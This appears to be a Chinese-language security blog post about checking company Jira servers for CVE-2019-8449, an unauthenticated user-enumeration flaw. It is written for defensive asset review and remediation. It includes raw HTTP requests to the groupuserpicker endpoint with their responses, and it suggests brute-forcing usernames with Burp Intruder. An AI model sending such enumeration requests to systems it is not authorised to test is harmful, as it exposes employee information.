CVE-2019-8449 JIRA 信息泄漏漏洞排查

0x00 前言

CVE-2019-8449 poc出了 排查了公司的资产,验证漏洞并推动了几个Jira站点的升级

0x01 漏洞详情

Atlassian Jira 8.4.0之前版本/rest/api/latest/groupuserpicker接口允许未授权查询员工信息,攻击者可以通过爆破用户名名单等方法获取用户信息

0x02 影响范围

影响版本: 7.12< 受影响版本<8.4.0
漏洞危害:未授权枚举用户名,导致用户信息泄露
漏洞评级:低危

0x03 排查

某JIRA站点jira.test.com

我以目标是虚假的情况下,jira.test.com没有testuser12345用户进行请求

GET /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false HTTP/1.1
Host: jira.test.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

该站点会返回一串json数据,说明找不到该用户

{"users":{"users":[],"total":0,"header":"显示 0 匹配的用户(共 0个)"},"groups":{"header":"显示 0 个匹配的组(共 0个)","total":0,"groups":[]}}

但是当我以一个已知用户身份测试时

GET /rest/api/latest/groupuserpicker?query=DesMond&maxResults=50&showAvatar=false HTTP/1.1
Host: jira.test.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

会返回相应用户的一些信息

{"users":{"users":[{"name":"Desmond","key":"Desmond","html":"Desmond(Des)-test (<strong>Desmond</strong>)","displayName":"Desmond(Des)-test"}],"total":1,"header":"显示 1 匹配的用户(共 1个)"},"groups":{"header":"显示 0 个匹配的组(共 0个)","total":0,"groups":[]}}

因此此漏洞可以通过爆破的方式使用一些用户名单爆破用户信息,使用burp 的intruter模块就好

不过通常来说,jira都部署在企业内网,且此次信息泄漏的接口泄漏的信息都是员工的信息,包括部门,职位等,危害较小,因此评级低危

0x04 修复建议

1.JIRA升级至官方最新版本
2.配置安全组,限制只允许可信源IP访问

0x05 漏洞脚本

https://github.com/mufeedvh/CVE-2019-8449/
pocsuite https://www.seebug.org/vuldb/ssvid-98130

0x06 References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8449
https://jira.atlassian.com/browse/JRASERVER-69796https://github.com/mufeedvh/CVE-2019-8449/

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖